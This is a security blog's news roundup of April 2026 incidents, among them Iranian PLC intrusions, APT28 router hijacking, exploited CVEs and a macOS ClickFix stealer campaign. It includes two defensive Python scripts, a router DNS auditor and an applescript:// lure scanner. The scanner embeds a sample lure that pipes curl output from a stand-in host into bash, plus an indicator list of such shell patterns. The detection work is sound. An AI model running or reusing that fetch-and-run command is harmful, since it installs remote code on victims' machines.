2026.04.14 News You Should Know

- 6 mins read

Series: News You Should Know 2026

Iran intruders disrupting US water, energy facilities • The Register - “These PLCs were deployed across multiple US critical infrastructure sectors within a wide variety of industrial automation processes … Some of the victims experienced operational disruption and financial loss,” it continued. It’s also worth noting that the energy and utilities sector was the fifth-most targeted industry in the US last month, according to Check Point’s cyberattack tracking.

‘Several dozen’ orgs targeted by a new extortion crew • The Register - UNC6783 primarily compromises call centers and business process outsourcers (BPOs) that work with larger companies. Once the criminals have access to the BPOs’ networks, they can use stolen legitimate credentials from BPO employees to break into their customers’ IT environments.

Last week, International Cyber Digest reported that Adobe was allegedly breached by an attacker calling themselves Mr. Raccoon, who reportedly gained access through an Indian BPO by first deploying a remote access tool on one employee and then phishing that worker’s manager.

The data thief claimed to have stolen 13 million support tickets with personal data, 15,000 employee records, all HackerOne submissions, internal documents, and other information.

Related: Google: New UNC6783 hackers steal corporate Zendesk support tickets

Ransomware scum, other crims exploit 4 old Microsoft bugs • The Register - The four CVEs:

  • CVE-2012-1854
  • CVE-2023-21529
  • CVE-2023-36424
  • CVE-2025-60710

Thousands of consumer routers hacked by Russia’s military - Ars Technica - An estimated 18,000 to 40,000 consumer routers, mostly those made by MikroTik and TP-Link, located in 120 countries, were wrangled into infrastructure belonging to APT28, an advanced threat group that’s part of Russia’s military intelligence agency known as the GRU, researchers from Lumen Technologies’ Black Lotus Labs said. The easiest way for people to know if their router has been compromised in the operation is to review the current DNS settings to see if they list unrecognized servers. Users should also check event logs for any unrecognized changes to DNS server settings. People should also strongly consider replacing end-of-life routers with ones that receive regular security updates. And never click through browser alerts warning of untrusted TLS certificates: a hijacked resolver can steer a connection to an attacker’s server, and the certificate warning is often the only visible sign that it happened.
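The DNS-settings check above can be scripted so it is repeatable. What follows is an added example, not code from Black Lotus Labs or Ars Technica. It parses a constructed sample of MikroTik `/ip dns print` output (the field names follow RouterOS as I know them, which is an assumption, not something the article states), flags any resolver that is neither on a local network nor in an owner-maintained allowlist, and also warns when `allow-remote-requests` is on, a RouterOS setting that makes the router answer DNS for anyone who can reach it. The allowlist and the 192.0.2.53 "rogue" server are made up for the example.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample of `/ip dns print` output from a MikroTik router. The
# field names follow RouterOS as far as I know them; this is an assumption, not
# output captured from the APT28 campaign. 192.0.2.53 plays the rogue resolver.
SAMPLE_DNS_PRINT = """\
                  servers: 192.0.2.53,9.9.9.9
          dynamic-servers: 203.0.113.1
    allow-remote-requests: yes
      max-udp-packet-size: 4096
               cache-size: 2048KiB
"""

# Resolvers the owner of this network expects (constructed for the example:
# a public resolver they chose plus the ISP-assigned one learned via DHCP).
EXPECTED_RESOLVERS = {"9.9.9.9", "203.0.113.1"}

# Address ranges treated as "local": a resolver here is the router itself or
# something on the LAN, not an unknown host on the internet. Listed explicitly
# because ipaddress.is_private also covers documentation ranges like 192.0.2.0/24.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16",
    "127.0.0.0/8", "fc00::/7", "fe80::/10", "::1/128")]


@dataclass
class Finding:
    severity: str
    message: str


def parse_dns_print(text: str) -> dict:
    """Turn the `key: value` lines of `/ip dns print` into a dict."""
    settings = {}
    for line in text.splitlines():
        m = re.match(r"\s*([\w-]+):\s*(.*?)\s*$", line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings


def split_servers(value: str) -> list:
    """RouterOS lists several servers as one comma-separated value."""
    return [s.strip() for s in value.split(",") if s.strip()]


def is_local(addr: str) -> bool:
    """True for RFC 1918, link-local and loopback addresses (v4 or v6)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETS)


def audit_dns(settings: dict, expected: set) -> list:
    """Flag resolvers that are neither local nor expected, plus the open-resolver setting."""
    findings = []
    for key in ("servers", "dynamic-servers"):
        for srv in split_servers(settings.get(key, "")):
            try:
                if srv in expected or is_local(srv):
                    continue
            except ValueError:
                findings.append(Finding("high", f"{key}: malformed resolver entry {srv!r}"))
                continue
            findings.append(Finding("high", f"{key}: unrecognized resolver {srv}"))
    if settings.get("allow-remote-requests") == "yes":
        findings.append(Finding(
            "medium",
            "allow-remote-requests=yes: the router answers DNS for any client that "
            "can reach it, so make sure the firewall drops UDP/TCP 53 from the WAN"))
    return findings


if __name__ == "__main__":
    for f in audit_dns(parse_dns_print(SAMPLE_DNS_PRINT), EXPECTED_RESOLVERS):
        print(f"[{f.severity}] {f.message}")
```

On a real router, feed the script the output of `/ip dns print` over SSH and keep the allowlist under version control so a diff of findings over time doubles as the "unrecognized changes" check the article recommends.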

Developer of VeraCrypt encryption software says Windows users may face boot-up issues after Microsoft locked his account | TechCrunch - The developer of the popular file encryption software VeraCrypt says Microsoft has blocked access to the account he used for sending updates to Windows users, and warned that anyone who encrypts their PCs with his software may soon face issues accessing their computers.

WireGuard VPN developer can’t ship software updates after Microsoft locks account | TechCrunch - Jason Donenfeld, the creator of the open source WireGuard VPN software, told TechCrunch that he has been locked out of his Microsoft developer account, and as a result cannot sign drivers or ship updates for WireGuard for Windows users, which are critical for its software to run. Donenfeld said in a post on X on Wednesday that the account termination stopped a WireGuard update from shipping.

Windscribe, a maker of VPN and other consumer privacy tools, said in a post on X that it had also been locked out of its Partner Center account. The company said it had a verified account for over eight years in order to sign its drivers.

Hacker stole £700,000 from UK energy company by redirecting payment | TechCrunch - British oil and gas company Zephyr Energy says someone stole £700,000 (close to $1 million) from one of its U.S.-based subsidiaries by redirecting a payment meant for a contractor into a hacker-controlled account.

France to ditch Windows for Linux to reduce reliance on US tech | TechCrunch - In a statement, French minister David Amiel said (translated) that the effort was to “regain control of our digital destiny” by relying less on U.S. tech companies. Amiel said that the French government can no longer accept that it doesn’t have control over its data and digital infrastructure.

Booking.com confirms hackers accessed customers’ data | TechCrunch - The user who posted the notification on Reddit told TechCrunch that they received a phishing message via WhatsApp two weeks ago that included “booking details and personal information.” That suggests hackers are leveraging the stolen information to target Booking.com customers.

Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure - Sysdig said it observed the first exploitation attempt targeting the vulnerability within 9 hours and 41 minutes of it being publicly disclosed, with a credential theft operation executed in minutes, despite there being no proof-of-concept (PoC) code available at the time.

Citizen Lab: Law Enforcement Used Webloc to Track 500 Million Devices via Ad Data - Customers of the tool can use it to monitor the location, movements, and personal characteristics of entire populations up to three years in the past. According to information available on Penlink’s website, Webloc can be used for “investigating and interpreting location-based data to support your cases.” Webloc also has the capability to infer location from IP addresses and identify the persons behind the devices by gathering their home addresses and workplaces.

U.S. customers of the Webloc include Immigration and Customs Enforcement (ICE), the U.S. military, Texas Department of Public Safety, DHS West Virginia, NYC district attorneys, and various police departments in Los Angeles, Dallas, Baltimore, Tucson, Durham, and in smaller cities and counties like the City of Elk Grove and Pinal County.

New macOS stealer campaign uses Script Editor in ClickFix attack - In a new campaign distributing Atomic Stealer observed by security researchers at Jamf, the hackers target victims with fake Apple-themed sites that pose as guides to help reclaim disk space on their Mac computers. These pages contain legitimate-looking system cleanup instructions but use the applescript:// URL scheme to launch Script Editor with pre-filled executable code, so the victim only has to press Run.
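Because the whole payload travels inside the link, a lure page like this can be spotted before anyone clicks. The scanner below is an added example, not code from Jamf or from the campaign: it pulls every `applescript://` href out of a constructed lure page, decodes the script Script Editor would be pre-filled with, and lists the hostile patterns in it. The `com.apple.scripteditor?action=new&script=` form of the URL is how I understand the scheme to work and is an assumption here, not something the article spells out; the shell command and host in the sample are made up.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed lure page in the style the Jamf write-up describes: cleanup
# instructions plus a link that opens Script Editor with a script pre-filled.
# The `com.apple.scripteditor?action=new&script=` URL form is an assumption
# about how the scheme works; the command and the host are made up.
SAMPLE_LURE_HTML = """\
<h2>Reclaim disk space on your Mac</h2>
<p>Step 1: open this page in Safari. Step 2: click the button below, then press
Run in the window that opens.</p>
<a href="applescript://com.apple.scripteditor?action=new&amp;script=do%20shell%20script%20%22curl%20-fsSL%20https%3A%2F%2Fexample.invalid%2Fclean.sh%20%7C%20bash%22">Free up space</a>
<a href="https://support.apple.com/">Apple Support</a>
"""

# Substrings that turn a pre-filled script from odd into hostile.
INDICATORS = ("do shell script", "curl ", "| bash", "| sh", "osascript",
              "base64", "xattr", "chmod +x", "nohup",
              "with administrator privileges")


class HrefCollector(HTMLParser):
    """Collect every href on the page; HTMLParser unescapes &amp; for us."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value)


def extract_applescript_links(html: str) -> list:
    """Return (url, decoded script) for every applescript:// link in the page."""
    collector = HrefCollector()
    collector.feed(html)
    results = []
    for href in collector.hrefs:
        parts = urlsplit(href)
        if parts.scheme.lower() != "applescript":
            continue
        params = parse_qs(parts.query)          # percent-decodes the script text
        script = params.get("script", [""])[0]
        results.append((href, script))
    return results


def suspicious_indicators(script: str) -> list:
    """Hostile patterns present in the script, in the order INDICATORS lists them."""
    low = script.lower()
    return [ind for ind in INDICATORS if ind in low]


def scan_page(html: str) -> list:
    """One finding per applescript:// link: the URL, the script and why it looks bad."""
    findings = []
    for href, script in extract_applescript_links(html):
        findings.append({"href": href, "script": script,
                         "indicators": suspicious_indicators(script)})
    return findings


if __name__ == "__main__":
    for f in scan_page(SAMPLE_LURE_HTML):
        print("Script Editor would open with:\n   ", f["script"])
        print("Indicators:", ", ".join(f["indicators"]) or "none")
```

The same logic works on mail bodies or proxy logs: any `applescript://` link whose decoded script shells out to `curl` piped into `bash` is worth blocking outright, and a legitimate disk-cleanup guide has no reason to hand Script Editor a script at all.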

FBI Extracts Suspect’s Deleted Signal Messages Saved in iPhone Notification Database - “Messages were recovered from Sharp’s phone through Apple’s internal notification storage—Signal had been removed, but incoming notifications were preserved in internal memory. Only incoming messages were captured (no outgoing).”

Google, Microsoft, Meta All Tracking You Even When You Opt Out, According to an Independent Audit - Each company disputed or took issue with the research, with Google saying it was based on a “fundamental misunderstanding” of how its product works. webXray is an independent technology company that runs a search engine that lets people look for privacy violations on the internet. Its founder Timothy Libert is the former lead of cookie policy and compliance at Google. Libert told 404 Media he felt his job at Google was to protect its users but that his bosses didn’t agree. He left the company in 2023 and started webXray.

I’m an experienced home cook, security engineer, people leader, and dedicated father and husband. I can be found on Mastodon at @IAintShootinMis@DigitalDarkAge.cc and on Signal at DigitalDarkAge.98. An RSS Feed of this blog is available here and a copy of my current OPML file is here.